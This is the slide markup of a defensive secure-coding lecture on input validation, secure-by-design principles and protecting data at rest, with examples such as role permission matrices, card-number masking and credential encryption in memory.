                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5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1799" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="20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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="5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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="15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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-10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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-20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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="15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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>method </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-395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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>before using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="10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1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5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1799" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:endParaRPr sz="1799">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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942012" y="2852924"/>
            <a:ext cx="5257800" cy="252376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Account for over 70% of network intrusions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Obtained by keylogging, malware, or phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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and Stolen Credentials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84" y="1524000"/>
            <a:ext cx="5051657" cy="475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9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130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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate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Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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-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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="9897707" cy="3683944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Alias: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Validation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Input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validation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time-consuming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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difficult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maintain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249479" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Attackers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often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turn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input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primary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means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attacking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gaining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information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about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application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46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Consequences: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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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application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functions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flawlessly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presence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incorrect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malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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inputs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9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Accidental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input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mistakes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discovered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properly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handled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Attackers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find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more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difficult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attack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application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131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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="1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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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0"/>
            <a:ext cx="9718049" cy="3556344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Always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test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big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three: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3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Correct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type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(null/non-null,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text/integer/float,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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scalar/array/object,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…)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leng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(minimu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-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-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maximum)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pta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nte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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="4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40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Whitelisting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possible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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="4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40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use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regular expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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test;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they are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best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descriptions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1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Remember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that </a:t>
            </a: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Boundaries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are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smooth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application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needs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test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all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input,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regardless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origin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Input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from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supposedly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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trusted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systems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subject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errors,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corruption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manipulation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132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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="1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20" dirty="0"/>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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10232265" cy="3610938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Modularized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input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validation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leads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to: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 mo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Consistent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application;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any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mistake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lead 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exploit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ier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upd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tin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patchi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cle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vie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purp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Client-side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validation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effective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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Common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tools,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like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web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proxies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used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intercept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messages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after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client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validation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modify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values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9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0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alid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 must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 d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ser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Validation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performed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client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user-friendliness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must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repeated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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2906908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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-5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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-4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249" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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0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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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249" spc="-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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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20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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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134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 Coding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Data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at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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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-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Introduction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267122"/>
            <a:ext cx="10012612" cy="3085296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Principle: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rest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must be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protected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meet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requirements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stored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as part of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 application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has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needs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Security,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which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determines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granted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granted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set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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Privacy,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determines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what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means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given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user;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what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form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what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operations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allowed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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="46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Example: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physicians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Los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Angles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hospital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have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full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3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patient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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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records;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but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extract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information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prurient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interest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can see,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this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be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 difficult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problem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135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6134799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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32267"/>
            <a:ext cx="10238613" cy="3518254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5078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 application has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information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that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can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 divided into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give different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types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access:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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admin,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agent,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support,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70" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>user,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guest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1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Each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has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tables/fields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others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(except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admin)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Ho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th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implemented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Solution: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Create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role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each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type,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 either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create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matrix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roles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resources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permissions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Create,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Read,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Update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Delete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each.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1170589" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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likely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opinion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roles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will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change,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so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make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system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configurable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1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Obviously,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Administrator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will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have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rights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over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role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privileges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136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6134799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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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1853971" y="4196718"/>
            <a:ext cx="7951304" cy="72117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84730" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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table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can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used to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determine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privileges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for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each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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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user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39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operation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47922" y="1428254"/>
          <a:ext cx="6113458" cy="2591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9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6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2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6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8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1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Resource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Admin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Agent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Support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3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Guest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10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User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Accounts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CRUD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RU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1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User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Permission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CRUD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Sales</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1300" b="1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latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Data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9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CRUD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9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RU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9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RU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9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9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9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1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Forum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1300" b="1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latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Data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9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CRUD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9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CRU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9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RU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9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CRU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9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9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1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Products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9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CRUD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9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CRU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9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RU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9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CRU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9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9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10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Orders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9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CRUD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9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CRUD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9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b="1" spc="5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>CRU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9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CRU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9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CR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49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137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6134799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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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0"/>
            <a:ext cx="10108472" cy="3912485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 application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manages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 online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sales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organization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Sales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consultants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need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personal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information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customer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phone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chat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including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credit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card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information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complete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purchases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But,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those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consultants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able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credit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card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numbers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Solution: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sales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consultants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payment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card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But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they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see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credit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card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masked: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****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****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****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9999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They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press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button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make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purchase,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but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PCN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Since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CV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codes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cannot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stored,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will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ask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customer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181556" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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server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logs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operations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create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audit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trail;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also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cannot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contain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199" spc="-67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PCN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138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6134799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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32267"/>
            <a:ext cx="10279242" cy="4219111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5078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 thick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client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handles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authentication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 application by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fetching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 user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name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password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first attempt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1828251" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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 additional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attempts are required, they can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 handled without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communicating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server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9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problem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username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 password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stored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client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vuln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4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able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cli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-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sid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ks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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Memory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dumps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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Dynamic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debuggers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1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Solution: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Encrypt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credentials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while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stored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memory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When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authentication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complete,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overwrite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all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memory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locations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encryption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keys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also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protected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139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5759" y="192105"/>
            <a:ext cx="8638830" cy="7072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12697" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90778" marR="4260841">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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10117994" cy="2906908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thick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client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caches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database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information</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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locally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improve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performance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client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has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everything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operate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Administrative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privileges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files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unprotected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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unless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encrypted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Solution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Send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requires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privacy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in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encrypted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form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database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controlled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by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application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decrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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locally,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overwrite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memory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immediately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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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942012" y="2852925"/>
            <a:ext cx="5257800" cy="252376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Holds your files or part of your system ransom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To return access, you have to pay cybercriminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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Ransomware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01" y="1557686"/>
            <a:ext cx="4907118" cy="476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8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140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5759" y="192105"/>
            <a:ext cx="8638830" cy="7072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12697" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90778" marR="4260841">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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0" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Rest</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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10151641" cy="3610938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Oracle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database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encrypt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column-wise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key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encryption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must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stored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somewhere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Oracle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stored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those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keys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database;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clear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terribly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secure,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$,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they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would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sell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TDE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Oracle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Wallet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Which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would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store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another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key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encrypt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keys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DB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But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keys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wallet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were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encrypted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another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key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which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was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stored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the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clear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memory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CVE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-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2006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-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0270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Solution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Public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key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encryption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could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end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endless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encryption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141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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc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Data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at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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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-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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
